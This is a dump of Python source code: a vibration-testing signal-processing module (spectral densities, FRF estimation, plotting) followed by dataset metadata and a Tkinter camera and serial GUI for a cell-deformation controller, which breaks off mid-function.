# f=np.reshape((1.0-1.933*np.cos(2*np.pi*(np.arange(n))/(n-1))+1.286*np.cos(4*np.pi*(np.arange(n))/(n-1))-0.338*np.cos(6*np.pi*(np.arange(n))/(n-1))+0.032*np.cos(8*np.pi*(np.arange(n))/(n-1))),(1,-1))
f = np.reshape(np.ones((1, n)), (1, -1))
f = f / la.norm(f) * np.sqrt(n)
return f
def hannwin(*args, **kwargs):
"""Alternative for function `hanning`."""
return hanning(*args, **kwargs)
def asd(x, t, windowname="none", ave=bool(True)):
"""Return autospectrum (power spectrum) density of a signal x.
Parameters
----------
x : float array
Data array (n x N x m) where n is the number of sensors, m the
number of experiments.
t : float array
Time array (1 x N)
windowname : string
Name of windowing function to use. See `window`.
ave : bool, optional(True)
Average result or not?
Returns
-------
f : float array
Frequency vector (1 x N)
Pxx : float array
Autospectrum (n x N) or (n x N x m) if not averaged.
Examples
--------
>>> from scipy import signal
>>> import numpy as np
>>> import matplotlib.pyplot as plt
>>> import vibrationtesting as vt
>>> import numpy.linalg as la
Generate a 5 second test signal, a 10 V sine wave at 50 Hz, corrupted by
0.001 V**2/Hz of white noise sampled at 1 kHz.
>>> sample_freq = 1e3
>>> tfinal = 5
>>> sig_freq=50
>>> A=10
>>> noise_power = 0.0001 * sample_freq / 2
>>> noise_power = A/1e12
>>> time = np.arange(0,tfinal,1/sample_freq)
>>> time = np.reshape(time, (1, -1))
>>> x = A*np.sin(2*np.pi*sig_freq*time)
>>> x = x + np.random.normal(scale=np.sqrt(noise_power),
... size=(1, time.shape[1]))
>>> fig, (ax1, ax2) = plt.subplots(2,1)
>>> ax1.plot(time[0,:],x[0,:])
[<matplotlib.lines.Line2D object at ...>]
>>> ax1.set_title('Time history')
Text(0.5,1,'Time history')
>>> ax1.set_xlabel('Time (sec)')
Text(0.5,0,'Time (sec)')
>>> ax1.set_ylabel('$x(t)$')
Text(0,0.5,'$x(t)$')
Compute and plot the autospectrum density.
>>> freq_vec, Pxx = vt.asd(x, time, windowname="hanning", ave=bool(False))
>>> ax2.plot(freq_vec, 20*np.log10(Pxx[0,:]))
[<matplotlib.lines.Line2D object at ...>]
>>> ax2.set_ylim([-400, 100])
(-400, 100)
>>> ax2.set_xlabel('frequency (Hz)')
Text(0.5,0,'frequency (Hz)')
>>> ax2.set_ylabel('PSD (V**2/Hz)')
Text(0,0.5,'PSD (V**2/Hz)')
If we average the last half of the spectral density, to exclude the
peak, we can recover the noise power on the signal.
"""
f, Pxx = crsd(x, x, t, windowname=windowname, ave=ave)
Pxx = Pxx.real
return f, Pxx
def crsd(x, y, t, windowname="none", ave=bool(True)):
"""
Calculate the cross spectrum (power spectrum) density between two signals.
Parameters
----------
x, y : arrays
Data array (n x N x m) where n is the number of sensors, m the
number of experiments.
t : array
Time array (1 x N)
windowname : string
Name of windowing function to use. See `window`.
ave : bool, optional
Average result or not?
Returns
-------
f : array
Frequency vector (1 x N)
Pxy : array
Autospectrum (n x N) or (n x N x m) if not averaged.
Examples
--------
>>> from scipy import signal
>>> import numpy as np
>>> import matplotlib.pyplot as plt
>>> import vibrationtesting as vt
>>> import numpy.linalg as la
Generate a 5 second test signal, a 10 V sine wave at 50 Hz, corrupted by
0.001 V**2/Hz of white noise sampled at 1 kHz.
>>> sample_freq = 1e3
>>> tfinal = 5
>>> sig_freq=50
>>> A=10
>>> noise_power = 0.0001 * sample_freq / 2
>>> noise_power = A/1e12
>>> time = np.arange(0,tfinal,1/sample_freq)
>>> time = np.reshape(time, (1, -1))
>>> x = A*np.sin(2*np.pi*sig_freq*time)
>>> x = x + np.random.normal(scale=np.sqrt(noise_power),
... size=(1, time.shape[1]))
>>> fig = plt.figure()
>>> plt.subplot(2,1,1)
<matplotlib...>
>>> plt.plot(time[0,:],x[0,:])
[<matplotlib.lines.Line2D object at ...>]
>>> plt.title('Time history')
Text(0.5,1,'Time history')
>>> plt.xlabel('Time (sec)')
Text(0.5,0,'Time (sec)')
>>> plt.ylabel('$x(t)$')
Text(0,0.5,'$x(t)$')
Compute and plot the autospectrum density.
>>> freq_vec, Pxx = vt.asd(x, time, windowname="hanning", ave=bool(False))
>>> plt.subplot(2,1,2)
<matplotlib...>
>>> plt.plot(freq_vec, 20*np.log10(Pxx[0,:]))
[<matplotlib.lines.Line2D object at ...>]
>>> plt.ylim([-400, 100])
(-400, 100)
>>> plt.xlabel('frequency (Hz)')
Text(0.5,0,'frequency (Hz)')
>>> plt.ylabel('PSD (V**2/Hz)')
Text(0,0.5,'PSD (V**2/Hz)')
>>> fig.tight_layout()
"""
# t_shape = t.shape
t = t.flatten()
if len(t) == 1:
dt = t
else:
dt = t[2] - t[1]
if dt <= 0:
print('You sent in bad data. Delta t is negative. \
Please check your inputs.')
if len(x.shape) == 1:
x = np.expand_dims(x, axis=0)
x = np.expand_dims(x, axis=2)
y = np.expand_dims(y, axis=0)
y = np.expand_dims(y, axis=2)
n = x.shape[1]
if windowname is False or windowname.lower() is "none":
win = 1
else:
# print('This doesn\'t work yet')
windowname = windowname.lower()
win = 1
if windowname == "hanning":
win = window(x, windowname='hanning')
elif windowname == "blackwin":
win = window(x, windowname='blackwin')
elif windowname == "boxwin":
win = window(x, windowname='boxwin')
elif windowname == "expwin":
win = window(x, windowname='expwin')
elif windowname == "hammwin":
win = window(x, windowname='hamming')
elif windowname == "triwin":
win = window(x, windowname='triwin')
elif windowname == "flatwin":
win = window(x, windowname='flatwin')
y = y * win
x = x * win
del win
ffty = np.fft.rfft(y, n, axis=1) * dt
fftx = np.fft.rfft(x, n, axis=1) * dt
Pxy = np.conj(fftx) * ffty / (n * dt) * 2
if len(Pxy.shape) == 3 and Pxy.shape[2] > 1 and ave:
Pxy = np.mean(Pxy, 2)
nfreq = 1 / dt / 2
f = np.linspace(0, nfreq, Pxy.shape[1]) # /2./np.pi
return f, Pxy
def frfest(x, f, dt, windowname="hanning", ave=bool(True), Hv=bool(False)):
r"""Return freq, H1, H2, coh, Hv.
Estimates the :math:`H(j\omega)` Frequency Response Functions (FRFs)
between :math:`x` and :math:`f`.
Parameters
----------
x : float array
output or response of system
f : float array
input to system
dt : float
time step of samples
windowname : string
One of: hanning, hamming, blackman, flatwin, boxwin
ave : bool, optional(True)- currently locked
whether or not to average PSDs and ASDs or calculate raw FRFs
Hv : bool, optional(False)
calculate the :math:`H_v` frequency response function
Returns
-------
freq : float array
frequency vector (1xN)
H1 : float array
Frequency Response Function :math:`H_1` estimate, (nxN) or (nxNxm)
H2 : float array
Frequency Response Function :math:`H_2` estimate, (nxN) or (nxNxm)
coh : float array
Coherance Function :math:`\gamma^2` estimate, (nxN)
Hv : float array
Frequency Response Function :math:`H_v` estimate, (nxN) or (nxNxm)
Currently ``ave`` is locked to default values.
Examples
--------
>>> import control as ctrl
>>> import matplotlib.pyplot as plt
>>> import vibrationtesting as vt
>>> import numpy as np
>>> sample_freq = 1e3
>>> noise_power = 0.001 * sample_freq / 2
>>> A = np.array([[0, 0, 1, 0],
... [0, 0, 0, 1],
... [-200, 100, -.2, .1],
... [100, -200, .1, -.2]])
>>> B = np.array([[0], [0], [1], [0]])
>>> C = np.array([[35, 0, 0, 0], [0, 35, 0, 0]])
>>> D = np.array([[0], [0]])
>>> sys = ctrl.ss(A, B, C, D)
>>> tin = np.arange(0, 51.2, .1)
>>> nr = .5 # 0 is all noise on input
>>> for i in np.arange(520):
... u = np.random.normal(scale=np.sqrt(noise_power), size=tin.shape)
... #print(u)
... t, yout, xout = ctrl.forced_response(sys, tin, u,rtol=1e-12)
... if 'Yout' in locals():
... Yout=np.dstack((Yout,yout
... +nr*np.random.normal(scale=.050*np.std(yout[0,:]),
... size=yout.shape)))
... Ucomb=np.dstack((Ucomb,u+(1-nr)
... *np.random.normal(scale=.05*np.std(u),
... size=u.shape)))
... else:
... Yout=yout+nr*np.random.normal(scale=.05*np.std(yout[0,:]),
... size=yout.shape)
... # noise on output is 5% scale of input
... Ucomb=u+(1-nr)*np.random.normal(scale=.05*np.std(u),
... size=u.shape)#(1, len(tin)))
... # 5% noise signal on input
>>> f, Hxy1, Hxy2, coh, Hxyv = vt.frfest(Yout, Ucomb, t, Hv=bool(True))
>>> vt.frfplot(f,Hxy2,freq_max=3.5, legend=['$H_{11}$', '$H_{12}$'])
... # doctest: +SKIP
>>> vt.frfplot(f, np.vstack((Hxy1[0,:], Hxy2[0,:], Hxyv[0,:])),
... legend=['$H_{11-1}$','$H_{11-2}$','$H_{11-v}$'])
... # doctest: +SKIP
Notes
-----
.. note:: Not compatible with scipy.signal functions
.. seealso:: :func:`asd`, :func:`crsd`, :func:`frfplot`.
.. warning:: hanning window cannot be selected yet. Averaging cannot be
unslected yet.
.. todo:: Fix averaging, windowing, multiple input.
"""
if len(f.shape) == 1:
f = f.reshape(1, -1, 1)
if len(x.shape) == 1:
x = x.reshape(1, -1, 1)
if len(f.shape) == 2:
if (f.shape).index(max(f.shape)) == 0:
f = f.reshape(max(f.shape), min(f.shape), 1)
else:
f = f.reshape(1, max(f.shape), min(f.shape))
if len(x.shape) == 2:
if (x.shape).index(max(x.shape)) == 0:
x = x.reshape(max(x.shape), min(x.shape), 1)
else:
x = x.reshape(1, max(x.shape), min(x.shape))
# Note: Two different ways to ignore returned values shown
Pff = asd(f, dt, windowname=windowname)[1]
freq, Pxf = crsd(x, f, dt, windowname=windowname)
_, Pxx = asd(x, dt)
# Note Pfx=conj(Pxf) is applied in the H1 FRF estimation
Txf1 = np.conj(Pxf / Pff)
Txf2 = Pxx / Pxf
# Nulled to avoid output problems/simplify calls if unrequested
Txfv = np.zeros_like(Txf1)
coh = (Pxf * np.conj(Pxf)).real / Pxx / Pff
if Hv:
for i in np.arange(Pxx.shape[1]):
frfm = np.array(
[[Pff[0, i], np.conj(Pxf[0, i])], [Pxf[0, i], Pxx[0, i]]])
alpha = 1 # np.sqrt(Pff[0,i]/Pxx[0,i])
frfm = np.array([[Pff[0, i], alpha * np.conj(Pxf[0, i])],
[alpha * Pxf[0, i], alpha**2 * Pxx[0, i]]])
lam, vecs = la.eigh(frfm)
index = lam.argsort()
lam = lam[index]
vecs = vecs[:, index]
Txfv[0, i] = -(vecs[0, 0] / vecs[1, 0]) / alpha
return freq, Txf1, Txf2, coh, Txfv
def frfplot(freq, H, freq_min=0, freq_max=None, type=1, legend=[]):
"""Frequency Response Function pretty plotting.
Plots frequency response functions in a variety of formats
Parameters
----------
freq : float array
Frequency vector (rad/sec), (1xN)
H : float array
Frequency response functions (nxN)
freq_min : float, optional
Low frequency for plot (default 0)
freq_min : float, optional
High frequency for plot (default max frequency)
legend : string array
Array of string for use in legend.
type : int, optional
Plot type. See notes.
Returns
-------
ax : axis objects
allows manipulation of plot parameters (xlabel, title...)
Examples
--------
>>> import matplotlib.pyplot as plt
>>> import vibrationtesting as vt
>>> import numpy as np
>>> f=np.linspace(0,100,10000).reshape(-1,1);
>>> w=f*2*np.pi;
>>> k=1e5;m=1;c=1;
>>> frf1=1./(m*(w*1j)**2+c*1j*w+k)
>>> frf2=1./(m*(w*1j)**2+c*1j*w+k*3)
>>> _ = vt.frfplot(f,np.hstack((frf1,frf2)), legend = ['FRF 1','FRF 2'])
... # doctest: +SKIP
Notes
-----
+---------+------------------------------------------------+
| type | Plot style |
+=========+================================================+
| 1 (def) | Magnitude and Phase versus F |
+---------+------------------------------------------------+
| 2 | Magnitude and Phase versus log10(F) |
+---------+------------------------------------------------+
| 3 | Bodelog (Magnitude and Phase versus log10(w)) |
+---------+------------------------------------------------+
| 4 | Real and Imaginary |
+---------+------------------------------------------------+
| 5 | Nyquist (Imaginary versus Real) |
+---------+------------------------------------------------+
| 6 | Magnitude versus F |
+---------+------------------------------------------------+
| 7 | Phase versus F |
+---------+------------------------------------------------+
| 8 | Real versus F |
+---------+------------------------------------------------+
| 9 | Imaginary versus F |
+---------+------------------------------------------------+
| 10 | Magnitude versus log10(F) |
+---------+------------------------------------------------+
| 11 | Phase versus log10(F) |
+---------+------------------------------------------------+
| 12 | Real versus log10(F) |
+---------+------------------------------------------------+
| 13 | Imaginary versus log10(F) |
+---------+------------------------------------------------+
| 14 | Magnitude versus log10(w) |
+---------+------------------------------------------------+
| 15 | Phase versus log10(w) |
+---------+------------------------------------------------+
.. seealso:: `frfest`
Copyright J. Slater, Dec 17, 1994
Updated April 27, 1995
Ported to Python, July 1, 2015
"""
FLAG = type # Plot type, should libe renamed throughout.
freq = freq.reshape(1, -1)
lenF = freq.shape[1]
if len(H.shape) is 1:
H = H.reshape(1, -1)
if H.shape[0] > H.shape[1]:
H = H.T
if freq_max is None:
freq_max = np.max(freq)
if freq_min is None:
freq_min = np.min(freq)
if freq_min < np.min(freq):
freq_min = np.min(freq)
if freq_min > freq_max:
raise ValueError('freq_min must be less than freq_max.')
# print(str(np.amin(freq)))
inlow = int(lenF * (freq_min - np.amin(freq)
) // (np.amax(freq) - np.amin(freq)))
inhigh = int(lenF * (freq_max - np.amin(freq)
) // (np.amax(freq) - np.amin(freq)) - 1)
# if inlow<1,inlow=1;end
# if inhigh>lenF,inhigh=lenF;end
"""print('freq shape: {}'.format(freq.shape))
print('H shape: {}'.format(H.shape))
print('Index of low frequency: {}'.format(inlow))
print('Index of high frequency: {}'.format(inhigh))"""
H = H[:, inlow:inhigh]
# print(H.shape)
freq = freq[:, inlow:inhigh]
mag = 20 * np.log10(np.abs(H))
# print(mag)
# print(mag.shape)
minmag = np.min(mag)
maxmag = np.max(mag)
phase = np.unwrap(np.angle(H)) * 180 / np.pi
# phmin_max=[min(phase)//45)*45 ceil(max(max(phase))/45)*45];
phmin = np.amin(phase) // 45 * 45.0
phmax = (np.amax(phase) // 45 + 1) * 45
"""minreal = np.amin(np.real(H))
maxreal = np.amax(np.real(H))
minimag = np.amin(np.imag(H))
maximag = np.amax(np.imag(H))"""
if FLAG is 1:
fig, (ax1, ax2) = plt.subplots(2, 1)
ax1.plot(freq.T, mag.T)
ax1.set_xlabel('Frequency (Hz)')
ax1.set_ylabel('Mag (dB)')
ax1.grid()
ax1.set_xlim(xmax=freq_max, xmin=freq_min)
ax1.set_ylim(ymax=maxmag, ymin=minmag)
ax2.plot(freq.T, phase.T)
ax2.set_xlabel('Frequency (Hz)')
ax2.set_ylabel('Phase (deg)')
ax2.grid()
ax2.set_xlim(xmax=freq_max, xmin=freq_min)
ax2.set_ylim(ymax=phmax, ymin=phmin)
ax2.set_yticks(np.arange(phmin, (phmax + 45), 45))
fig.tight_layout()
if len(legend) > 0:
plt.legend(legend)
ax = (ax1, ax2)
else:
print("Sorry, that option isn't supported yet")
return ax
"""# elif FLAG==2:
# subplot(2,1,1)
# semilogx(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# % Fmin,Fmax,min(mag),max(mag)
# axis([Fmin Fmax minmag maxmag])
# subplot(2,1,2)
# semilogx(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# elif FLAG==3:
# subplot(2,1,1)
# mag=20*log10(abs(Xfer));
# semilogx(F*2*pi,mag)
# xlabel('Frequency (Rad/s)')
# ylabel('Mag (dB)')
# grid on
# axis([Wmin Wmax minmag maxmag])
# zoom on
# subplot(2,1,2)
# semilogx(F*2*pi,phase)
# xlabel('Frequency (Rad/s)')
# ylabel('Phase (deg)')
# grid on
# axis([Wmin Wmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# elseif FLAG==4
# subplot(2,1,1)
# plot(F,real(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Real')
# grid on
# axis([Fmin Fmax minreal maxreal])
# zoom on
# subplot(2,1,2)
# plot(F,imag(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Imaginary')
# grid on
# axis([Fmin Fmax minimag maximag])
# zoom on
# elseif FLAG==5
# subplot(1,1,1)
# imax=round(length(F)*Fmax/max(F));
# imin=round(length(F)*Fmin/max(F))+1;
# plot(real(Xfer(imin:imax)),imag(Xfer(imin:imax)))
# xlabel('Real')
# ylabel('Imaginary')
# grid on
# zoom on
# elseif FLAG==6
# subplot(1,1,1)
# mag=20*log10(abs(Xfer));
# plot(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# axis([Fmin Fmax minmag maxmag])
# zoom on
# elseif FLAG==7
# subplot(1,1,1)
# plot(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45];
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
# elseif FLAG==8
# subplot(1,1,1)
# plot(F,real(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Real')
# grid on
# axis([Fmin Fmax minreal maxreal])
# zoom on
# elseif FLAG==9
# subplot(1,1,1)
# plot(F,imag(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Imaginary')
# grid on
# axis([Fmin Fmax minimag maximag])
# zoom on
# elseif FLAG==10
# subplot(1,1,1)
# mag=20*log10(abs(Xfer));
# semilogx(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# axis([Fmin Fmax minmag maxmag])
# zoom on
# elseif FLAG==11
# subplot(1,1,1)
# semilogx(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45];
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
# elseif FLAG==12
# subplot(1,1,1)
# semilogx(F,real(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Real')
# grid on
# axis([Fmin Fmax minreal maxreal])
# zoom on
# elseif FLAG==13
# subplot(1,1,1)
# semilogx(F,imag(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Imaginary')
# grid on
# axis([Fmin Fmax minimag maximag])
# zoom on
# elseif FLAG==14
# subplot(1,1,1)
# mag=20*log10(abs(Xfer));
# semilogx(F*2*pi,mag)
# xlabel('Frequency (Rad/s)')
# ylabel('Mag (dB)')
# grid on
# axis([Wmin Wmax minmag maxmag])
# zoom on
# elseif FLAG==15
# subplot(1,1,1)
# semilogx(F*2*pi,phase)
# xlabel('Frequency (Rad/s)')
# ylabel('Phase (deg)')
# grid on
# axis([Wmin Wmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
# else
# subplot(2,1,1)
# mag=20*log10(abs(Xfer));
# plot(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# axis([Fmin Fmax minmag maxmag])
# zoom on
# subplot(2,1,2)
# plot(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45];
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
"""
def xcorr(t, x, y, zeropad=True):
"""Sorry, no docs or tests yet."""
tau = t
# sx = len(x)
# sy = len(y)
if zeropad is True:
Xn = np.fft.rfft(x, n=len(x) * 2)
Yn = np.conj(sp.fft(y, n=len(x) * 2))
else:
Xn = np.fft.rfft(x)
Yn = np.conj(np.fft.rfft(y))
xcor = np.real(fftpack.fftshift(sp.ifft(Xn * Yn)))
dt = t[1] - t[0]
tau = np.linspace(-len(xcor) / 2 * dt - dt / 2,
len(xcor) / 2 * dt - dt / 2, len(xcor))
return tau, xcor
def hammer_impulse(time, imp_time=None, imp_duration=None, doublehit=False,
dh_delta=None):
"""Generate simulated hammer hit (half sine).
Parameters
----------
time : float array
1 x N time array. Suggest using `np.linspace(0,10,1000).reshape(1,-1)`
for example
imp_time : float (optional)
Time of onset of impulse. Default is 0.1 time end time- which
traditionally works well for impact testing
imp_duration : float (optional)
Duration of impulse. Default is 0.01 of total record
doublehit : Boolean (optional)
Allows repeat of hit to emulate a bad strike. Default is False
dh_delta : float (optional)
Time difference between primary strike and accidental second strike
Default is 0.02 of record.
Returns
-------
force : float array
Examples
--------
>>> import vibrationtesting as vt
>>> time = np.linspace(0,10,1024).reshape(1,-1)
>>> force = vt.hammer_impulse(time, doublehit=True)
>>> plt.plot(time.T, force.T)
[<matplotlib.lines.Line2D object...
"""
time_max = np.max(time)
if imp_time is None:
imp_time = 0.1 * time_max
if imp_duration is None:
imp_duration = 0.01 * time_max
if dh_delta is None:
dh_delta = 0.02
dh_delta = dh_delta * time_max
time = time.reshape(1, -1)
imp_onset_index = int(time.shape[1] * imp_time / time_max)
imp_offset_index = int((time.shape[1]) *
(imp_time + imp_duration) / time_max)
imp_length = imp_offset_index - imp_onset_index
T = imp_duration * 2
omega = 2 * np.pi / T
impulse = np.sin(omega * time[0, :imp_length])
force = np.zeros_like(time)
force[0, imp_onset_index:imp_onset_index + imp_length] = impulse
if doublehit is True:
doub_onset_index = int(time.shape[1]
* (imp_time + dh_delta) / time_max)
force[0, doub_onset_index:doub_onset_index + imp_length] = impulse
force = force / spi.simps(force.reshape(-1), dx=time[0, 1])
return force
def decimate(t, in_signal, sample_frequency):
r"""Decimate a signal to mimic sampling anti-aliased signal.
Returns the signal down-sampled to `sample_frequency` with an
anti-aliasing filter applied at 45% of ` sample_frequency`.
Parameters
----------
t : float array
time array, size (N,)
signal : float array
signal array, size (N,), (m,N), or (m,N,n)
sample_frequency : float
new sampling frequency
Returns
-------
time : float array
decimated_signal : float array
Examples
--------
>>> time = np.linspace(0,4,4096)
>>> u = np.random.randn(1,len(time))
>>> ttime, signal_out = decimate(time, u, 100)
"""
dt = t[1] - t[0]
current_frequency = 1 / dt
freq_frac = sample_frequency / current_frequency
Wn = .9 * freq_frac
b, a = signal.butter(8, Wn, 'low')
if len(in_signal.shape) > 1:
filtered_signal = signal.lfilter(b, a, in_signal, axis=1)
else:
filtered_signal = signal.lfilter(b, a, in_signal)
step = int(1 / freq_frac)
time = t[::step]
if len(in_signal.shape) == 1:
filtered_signal = filtered_signal[::step]
elif len(in_signal.shape) == 2:
filtered_signal = filtered_signal[:, ::step]
elif len(in_signal.shape) == 3:
filtered_signal = filtered_signal[:, ::step, :]
return time, filtered_signal
| 0 | 0 | 0 |
db255c8246a0e7204c25b22268d2980bd45f40ed | 7,260 | py | Python | GUIcode.py | snakerboy1234/Cytomech | 69f27e72fc5f771245162b9a9fb63a81baa5b1c7 | [
"MIT"
] | null | null | null | GUIcode.py | snakerboy1234/Cytomech | 69f27e72fc5f771245162b9a9fb63a81baa5b1c7 | [
"MIT"
] | null | null | null | GUIcode.py | snakerboy1234/Cytomech | 69f27e72fc5f771245162b9a9fb63a81baa5b1c7 | [
"MIT"
] | null | null | null | import serial
import time
import tkinter
import tkinter.font as font
from datetime import datetime
from PIL import ImageTk, Image
import sys
import pypylon.pylon as py
import matplotlib.pyplot as plt
import numpy as np
import cv2
# SOME PART OF CAMERA CODE CREATES AN INSTANCE OF TK THAT USES PACK. SO WE CANNOT USE GRID AND WE HAVE TO
# ASSIGN EACH COMPONENT TO THE MASTER=FRAME
# Note that the camera code will throw exception if camera is not connected.
# Locate & Initialize camera
cam = py.InstantCamera(py.TlFactory.GetInstance().CreateFirstDevice())
cam.Open()
# Reset to factory Defaults
cam.UserSetSelector = "Default"
cam.UserSetLoad.Execute()
# Set to blk/white photo
cam.PixelFormat = "RGB8"
# Take one picture - need dif approach for looping imgs
res = cam.GrabOne(1000)
# Get array form of picture
img = res.Array
# Display our image
plt.imshow(img)
# Below is the code for handling images in the background
# We need this so that our GUI still responds while pictures are being taken automatically
# We need to decide how many pictures we want to take with each burst, and whether the user tells us when to take or whether they are collected automatically
# We should also display the images as they are taken (or at least one from each burst) so that the user has some sense of what's actually happening
# If we want to do all camera management through our GUI, we should have a way for the user to see what's happening without saving the pictures to save space
# We also need to decide WHEN we want to calculate deformation. If we calculate it automatically then we could do so as soon as the images are taken.
# If we rely on the user to outline the image, we need to make sure that we hold onto the voltage value associated with the image until that time.
converter = py.ImageFormatConverter()
converter.OutputPixelFormat = py.PixelType_BGR8packed
converter.OutputBitAlignment = py.OutputBitAlignment_MsbAligned
imgs = []
ser = serial.Serial('com3', 9600)
ser.write(bytes([0]))
frame = tkinter.Tk()
frame.geometry('1000x800')
frame.title("Cytomech DEP Controller")
lgFont = "Times 20 bold"
PIL_image = np.ones((900,600))*150
tk_image = ImageTk.PhotoImage(master=frame,image=Image.fromarray(PIL_image))
imgLbl = tkinter.Label(frame,image=tk_image,width=900,height=600)
imgLbl.pack()
decVoltageBtn = tkinter.Button(frame,
text="-",
font=lgFont,
command=decVoltage,
height = 2,
fg = "black",
bg = 'yellow',
width = 4,
bd = 5,
activebackground='white'
)
#decVoltageBtn.grid(row=1,column=1,rowspan=2, padx=20, pady=5)
decVoltageBtn.pack(padx = 10, pady = 10, ipadx=10,ipady=10,expand=True,fill='both',side="left")
voltageTxt = tkinter.StringVar(master=frame)
voltIndex = tkinter.IntVar(master=frame)
voltIndex.set(0)
voltageTxt.set("Current Vpp (est): 0")
voltLbl = tkinter.Label(frame,textvariable=voltageTxt, width = 15,font=lgFont)
#voltLbl.grid(row=3,column=1,columnspan=3, padx=20, pady=5)
voltLbl.pack(pady = 10,expand=True,fill='both',side="left")
incVoltageBtn = tkinter.Button(frame,
text="+",
font=lgFont,
command=incVoltage,
height = 2,
fg = "black",
bg = 'green',
width = 4,
bd = 5,
activebackground='white'
)
#incVoltageBtn.grid(row=1,column=3,rowspan=2)
incVoltageBtn.pack(padx = 10, pady = 10,ipadx=10,ipady=10,expand=True,fill='both',side="left")
photoBtn = tkinter.Button(frame,
text="Take Photo",
font=lgFont,
command=takePhoto,
height = 2,
fg = "black",
bg = '#FF7715',
width = 10,
bd = 5,
activebackground='white'
)
#photoBtn.grid(row=4,column=1,rowspan=2, padx=20, pady=5)
photoBtn.pack(padx = 10, pady = 10, ipadx=10,ipady=10,expand=True,fill='both',side="left")
quitButton = tkinter.Button(
frame,
text="QUIT",
font=lgFont,
command=quit,
height = 2,
fg = "black",
width = 5,
bg = 'red',
bd = 5
)
#quitButton.grid(row=4,column=3,rowspan=2, padx=20, pady=5)
quitButton.pack(padx = 10, pady = 10,ipadx=10,ipady=10,expand=True,fill='both',side="left")
tkinter.mainloop() | 35.072464 | 158 | 0.684022 | import serial
import time
import tkinter
import tkinter.font as font
from datetime import datetime
from PIL import ImageTk, Image
import sys
import pypylon.pylon as py
import matplotlib.pyplot as plt
import numpy as np
import cv2
# SOME PART OF CAMERA CODE CREATES AN INSTANCE OF TK THAT USES PACK. SO WE CANNOT USE GRID AND WE HAVE TO
# ASSIGN EACH COMPONENT TO THE MASTER=FRAME
# Note that the camera code will throw exception if camera is not connected.
# Locate & Initialize camera
cam = py.InstantCamera(py.TlFactory.GetInstance().CreateFirstDevice())
cam.Open()
# Reset to factory Defaults
cam.UserSetSelector = "Default"
cam.UserSetLoad.Execute()
# Set to blk/white photo
cam.PixelFormat = "RGB8"
# Take one picture - need dif approach for looping imgs
res = cam.GrabOne(1000)
# Get array form of picture
img = res.Array
# Display our image
plt.imshow(img)
# Below is the code for handling images in the background
# We need this so that our GUI still responds while pictures are being taken automatically
# We need to decide how many pictures we want to take with each burst, and whether the user tells us when to take or whether they are collected automatically
# We should also display the images as they are taken (or at least one from each burst) so that the user has some sense of what's actually happening
# If we want to do all camera management through our GUI, we should have a way for the user to see what's happening without saving the pictures to save space
# We also need to decide WHEN we want to calculate deformation. If we calculate it automatically then we could do so as soon as the images are taken.
# If we rely on the user to outline the image, we need to make sure that we hold onto the voltage value associated with the image until that time.
class HysteresisImgWrapper():
def __init__(self, imageArray, voltageLevel):
self.img = imageArray
self.voltage = voltageLevel
self.deformation = 0
converter = py.ImageFormatConverter()
converter.OutputPixelFormat = py.PixelType_BGR8packed
converter.OutputBitAlignment = py.OutputBitAlignment_MsbAligned
imgs = []
def takePhoto():
# Takes a single photo of the current view. Blocks for 1sec to ensure proper photo saving.
print("Saving photo as timestamp to save_images folder (must be in same folder as this script)")
curDT = datetime.now()
date_time = curDT.strftime("%m-%d-%Y_%Hh%Mm%Ss")
result = cam.GrabOne(1000)
img = result.Array # This is the format we want to save
# Convert & Resize image for GUI display
PIL_image = Image.fromarray(np.uint8(img)).convert('RGB')
PIL_image = PIL_image.resize((900,600))
tk_image = ImageTk.PhotoImage(master=frame,image=PIL_image)
imgLbl.config(image=tk_image)
imgLbl.image = tk_image
# Add image to our list
voltage = voltageMap(voltIndex.get())
imgs.append(HysteresisImgWrapper(img,voltage))
# Convert image for automatic saving. Note that we can replace this with a "Save" button in future if we want
image = converter.Convert(result)
img = image.GetArray() # This is the format converted to BGR for writing with OpenCV
cv2.imwrite('save_images/%s.png'%date_time,img)
# Now we can do whatever we want with the photos. We can allocate space in the GUI for an image and plop whichever we want from the burst in there.
# Have to keep in mind that this handler is destroyed after each burst. Could do a global handler. Either way have to make sure we save any info we need.
def voltageMap(voltageIndex):
# Since the voltage scaling is sometimes nonlinear, this function will use a constant table of
# practically attainable voltage values to determine what practical voltage is attained by the next increment
# Note that, on the arduino side, the correspond to increments between OCR1A = 38 (25% d.c.) and OCR1A = 144 (90% d.c.)
